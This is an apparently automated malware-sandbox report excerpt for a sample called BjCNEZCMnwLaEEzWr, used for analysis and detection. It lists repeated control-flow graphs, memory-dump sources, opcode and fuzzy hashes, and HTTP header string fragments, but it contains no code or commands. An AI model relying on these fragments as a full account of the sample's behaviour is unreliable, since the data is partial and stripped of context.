control_flow_graph 111 8b4674-8b4680 112 8b468b-8b468d 111->112 113 8b4686 call 8b3a1c 111->113 114 8b468f-8b4698 call 8b3a6e 112->114 115 8b469d-8b46cd 112->115 113->112 114->115 118 8b46d3-8b46f5 115->118 119 8b47e7-8b47ec 115->119 118->119 121 8b46fb-8b4720 118->121 123 8b4738-8b475a 121->123 124 8b4722-8b4737 121->124 126 8b47bf-8b47c9 123->126 127 8b475c-8b477e 123->127 124->123 128 8b47cb-8b47dd call 8b3673 126->128 129 8b47e0-8b47e5 126->129 127->126 133 8b4780-8b47a2 127->133 128->129 129->119 133->126 135 8b47a4-8b47bc 133->135 135->126
Memory Dump Source
• Source File: 00000028.00000002.2914978673.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_40_2_8b0000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 82efd7b73b9b4bc61e2ce57c5cb368d0ec56d42def0a996e4312fb273a90e693
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: CA4163B6500608BFEF129F65CC44BEEBFB9FF84704F154059EA44EA255DB309A44CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 b5093e-b5095f call b50cc4 call b514bc call b53cc0 8 b50967-b50989 0->8 10 b50af1-b50af2 8->10 11 b5098f-b509d2 call b509d9 8->11 15 b509d4-b509d5 11->15 16 b50a3d-b50a76 11->16 18 b509d7-b509e8 call b53653 15->18 19 b50a3c 15->19 17 b50a7e-b50a80 16->17 21 b50a82-b50aae 17->21 22 b50aec call b50af3 17->22 18->22 30 b509ee-b50a10 18->30 19->16 21->22 27 b50ab0-b50abc 21->27 22->10 31 b50ac1-b50ae5 27->31 30->22 34 b50a16-b50a3b 30->34 31->10 37 b50ae7-b50aea 31->37 34->22 38 b50a41-b50a76 34->38 37->22 37->31 38->17
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: 05560e18a046293cdd9cee99888cfc54633264ae3799d73c3e62e7a93d072922
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 0A5191315443549FEF226F20CC85B9977F8EF04745F0801D9BE45FE0D6DAB09A94CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 b514bc-b514df call b514de 42 b514e1-b51500 call b50c9c 39->42 43 b51502-b51590 call b51345 * 6 39->43 42->43
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction ID: 095adf223c21b9357d28cfe1333bffdb67ee217c872dc1fc7d6dec891200ad48
                                                                                                                                                                • Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction Fuzzy Hash: E7210372404614AEDB03BF60C9C9EA673ECEF40705F4509EAAD85EF049FAB09158CAE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 59 b51345-b51352 60 b51358-b5135e 59->60 61 b513eb-b513ec 59->61 60->61 62 b51364-b5137a 60->62 62->61 64 b5137c-b5138f 62->64 66 b51391-b51398 64->66 67 b5139b-b513ab call b50e7c 66->67 70 b513ad-b513e2 67->70 70->61
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 250b6efdbeabafb02b7699acfcdc70c0b1cca8efe4ea4f08b1870a91deddb27c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 2821AE31904216AFDB11DF78C885B5DBBF5AF08301F054295FD55BB594D770A804CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 b514de-b51590 call b53653 call b50c9c call b51345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction ID: 2acb1f6591c648b665f226d1fd946c4c1a5a16dfac9474d137f4cdbd4b3397d6
                                                                                                                                                                • Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction Fuzzy Hash: 1711BF72404514AEEF03BF60C5C9DAA73ECEE40705B4509EAAD85EF44AFFB09158CAE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 90 b53f0d-b53f29 call b53653 call b5379f 95 b53f3b-b53f66 call b53f78 * 3 90->95 96 b53f2b-b53f39 call b5401b 90->96 109 b53f71 95->109 103 b53f76-b53f77 96->103 109->103 110 b53f71 call b53f78 109->110 110->103
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction ID: 417b22bac520854fff9ff1abcc422e05309419c94b671c9c922ecec91938a8fe
                                                                                                                                                                • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction Fuzzy Hash: FDF01270D88340A6EF413BB09C4B75D36F49F40B87F0405D1BE49AD1D6DEB056589E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 136 b54675-b5468d call b53a1c 139 b5469d-b546cd 136->139 140 b5468f-b54698 call b53a6e 136->140 143 b547e7-b547ec 139->143 144 b546d3-b546f5 139->144 140->139 144->143 146 b546fb-b54720 144->146 148 b54722-b54737 146->148 149 b54738-b5475a 146->149 148->149 151 b5475c-b5477e 149->151 152 b547bf-b547c9 149->152 151->152 158 b54780-b547a2 151->158 153 b547e0-b547e5 152->153 154 b547cb-b547dd call b53673 152->154 153->143 154->153 158->152 160 b547a4-b547bc 158->160 160->152
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 38ecaadd12c3313dec0188656f6bec9c7165f8e60a9be1021cc69fd14acc106c
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: D441A4B6500208BFEF125F65CC48BDEBFF9EF84704F154099EA44AA254D770DA94CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 111 b54674-b54680 112 b5468b-b5468d 111->112 113 b54686 call b53a1c 111->113 114 b5469d-b546cd 112->114 115 b5468f-b54698 call b53a6e 112->115 113->112 118 b547e7-b547ec 114->118 119 b546d3-b546f5 114->119 115->114 119->118 121 b546fb-b54720 119->121 123 b54722-b54737 121->123 124 b54738-b5475a 121->124 123->124 126 b5475c-b5477e 124->126 127 b547bf-b547c9 124->127 126->127 133 b54780-b547a2 126->133 128 b547e0-b547e5 127->128 129 b547cb-b547dd call b53673 127->129 128->118 129->128 133->127 135 b547a4-b547bc 133->135 135->127
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000029.00000002.2918966978.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_41_2_b50000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 7802c7558289ca189bcb444ea61648bdbfb76ada864200e22cb9c0802df94950
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 5F4193B6500208BFEF129FA4CC44BEEBFF9EF84704F154099EA44AA254D7709A84CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 2eb093e-2eb095f call 2eb0cc4 call 2eb14bc call 2eb3cc0 8 2eb0967-2eb0989 0->8 10 2eb098f-2eb09d2 call 2eb09d9 8->10 11 2eb0af1-2eb0af2 8->11 15 2eb0a3d-2eb0a76 10->15 16 2eb09d4-2eb09d5 10->16 17 2eb0a7e-2eb0a80 15->17 18 2eb0a3c 16->18 19 2eb09d7-2eb09e8 call 2eb3653 16->19 20 2eb0aec call 2eb0af3 17->20 21 2eb0a82-2eb0aae 17->21 18->15 19->20 30 2eb09ee-2eb0a10 19->30 20->11 21->20 27 2eb0ab0-2eb0abc 21->27 31 2eb0ac1-2eb0ae5 27->31 30->20 34 2eb0a16-2eb0a3b 30->34 31->11 37 2eb0ae7-2eb0aea 31->37 34->20 38 2eb0a41-2eb0a76 34->38 37->20 37->31 38->17
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: c2ee671aa327fb6d2753e5393e31d08fa6376d2dd44720bdc6f6d466afb9d340
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: FE51B0311842549FEF239F20CC85BEB3BB8AF05744F040599BA49FE0D6DBB0A590CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 2eb14bc-2eb1590 call 2eb14de call 2eb0c9c call 2eb1345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction ID: 7279ac5924f600a8290fb80157424e7d38a9b508ca0b7cd7cb3005aa9d22c535
                                                                                                                                                                • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction Fuzzy Hash: B721FA724046149EDF03AF60C9C88E773ECEF40704F45496AA989EF049FA709554CEE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 58 2eb1345-2eb1352 59 2eb13eb-2eb13ec 58->59 60 2eb1358-2eb135e 58->60 60->59 61 2eb1364-2eb137a 60->61 61->59 63 2eb137c-2eb138f 61->63 65 2eb1391-2eb1398 63->65 66 2eb139b-2eb13ab call 2eb0e7c 65->66 69 2eb13ad-2eb13e2 66->69 69->59
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 6e1dd539d5b8ba6a9d1a466c50e34a4514fef2ac308abd30f8c9cde112378757
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 6321C031944216AFDF129F78D844B9EBBB5AF04314F058215FD59BF594D730E800CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 70 2eb14de-2eb1590 call 2eb3653 call 2eb0c9c call 2eb1345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction ID: d4b2e24409008a2caa406e5bf1555a4e80b04fa7f2c01a71e509cb224d1fb62e
                                                                                                                                                                • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction Fuzzy Hash: DE1174724046149EEF03AF60C5C88EB73ECEE40708B4659AAAD89EF459FE709154CEE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 88 2eb3f0d-2eb3f29 call 2eb3653 call 2eb379f 93 2eb3f3b-2eb3f66 call 2eb3f78 * 3 88->93 94 2eb3f2b-2eb3f39 call 2eb401b 88->94 107 2eb3f71 93->107 102 2eb3f76-2eb3f77 94->102 107->102 108 2eb3f71 call 2eb3f78 107->108 108->102
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction ID: 6c91dd185fa38f9807c5f836e0286e778a149f34da3cce1e748cea74dd893dc5
                                                                                                                                                                • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction Fuzzy Hash: 38F08C705C8240EAEF033BB18C4F6CB33B9AF00705F04A1D0BA89AD0D4CE3095508E71
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 134 2eb4675-2eb468d call 2eb3a1c 137 2eb468f-2eb4698 call 2eb3a6e 134->137 138 2eb469d-2eb46cd 134->138 137->138 141 2eb46d3-2eb46f5 138->141 142 2eb47e7-2eb47ec 138->142 141->142 144 2eb46fb-2eb4720 141->144 146 2eb4738-2eb475a 144->146 147 2eb4722-2eb4737 144->147 149 2eb47bf-2eb47c9 146->149 150 2eb475c-2eb477e 146->150 147->146 151 2eb47cb-2eb47dd call 2eb3673 149->151 152 2eb47e0-2eb47e5 149->152 150->149 156 2eb4780-2eb47a2 150->156 151->152 152->142 156->149 158 2eb47a4-2eb47bc 156->158 158->149
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 92e1d72827fd8e23f92ca086b13215db22f4d29fb33ce502f8fc9f9e1bd7525e
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: BD4185B6500218BFEF125F65CC48BDEBFBAEF84708F154069EA44AA295D730D650CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 109 2eb4674-2eb4680 110 2eb468b-2eb468d 109->110 111 2eb4686 call 2eb3a1c 109->111 112 2eb468f-2eb4698 call 2eb3a6e 110->112 113 2eb469d-2eb46cd 110->113 111->110 112->113 116 2eb46d3-2eb46f5 113->116 117 2eb47e7-2eb47ec 113->117 116->117 119 2eb46fb-2eb4720 116->119 121 2eb4738-2eb475a 119->121 122 2eb4722-2eb4737 119->122 124 2eb47bf-2eb47c9 121->124 125 2eb475c-2eb477e 121->125 122->121 126 2eb47cb-2eb47dd call 2eb3673 124->126 127 2eb47e0-2eb47e5 124->127 125->124 131 2eb4780-2eb47a2 125->131 126->127 127->117 131->124 133 2eb47a4-2eb47bc 131->133 133->124
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002A.00000002.2927163843.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_42_2_2eb0000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 80bf934447bd81371c181131f6ddb17b7d8d0f8ff7a2cadc8ba3f9d96be2ae56
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 534163B6500218BFEF129F65CC44BDEBBBAEF84708F154069EA44AA295D7309640CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 2d1093e-2d1095f call 2d10cc4 call 2d114bc call 2d13cc0 8 2d10967-2d10989 0->8 10 2d10af1-2d10af2 8->10 11 2d1098f-2d109d2 call 2d109d9 8->11 15 2d109d4-2d109d5 11->15 16 2d10a3d-2d10a76 11->16 18 2d109d7-2d109e8 call 2d13653 15->18 19 2d10a3c 15->19 17 2d10a7e-2d10a80 16->17 21 2d10a82-2d10aae 17->21 22 2d10aec call 2d10af3 17->22 18->22 30 2d109ee-2d10a10 18->30 19->16 21->22 27 2d10ab0-2d10abc 21->27 22->10 31 2d10ac1-2d10ae5 27->31 30->22 33 2d10a16-2d10a3b 30->33 31->10 37 2d10ae7-2d10aea 31->37 33->22 38 2d10a41-2d10a76 33->38 37->22 37->31 38->17
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: c291d25784932bde87530bc4f36875857955563f895ee08658809ebf7c2dd5d4
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 4051A131544254AFEB126F20CC85B9977BCEF04744F0401D9BE49FE1D6DBB09990CB65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2d114bc; graph rendering omitted)

Memory Dump Source
• Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2d11345; graph rendering omitted)

Memory Dump Source
• Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2d114de; graph rendering omitted)

Memory Dump Source
• Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2d13f0d; graph rendering omitted)

Memory Dump Source
• Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2d14675; graph rendering omitted)

Strings
Memory Dump Source
• Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2d14674; graph rendering omitted)

Strings
Memory Dump Source
• Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2b4093e; graph rendering omitted)

Memory Dump Source
• Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2b414bc; graph rendering omitted)

Memory Dump Source
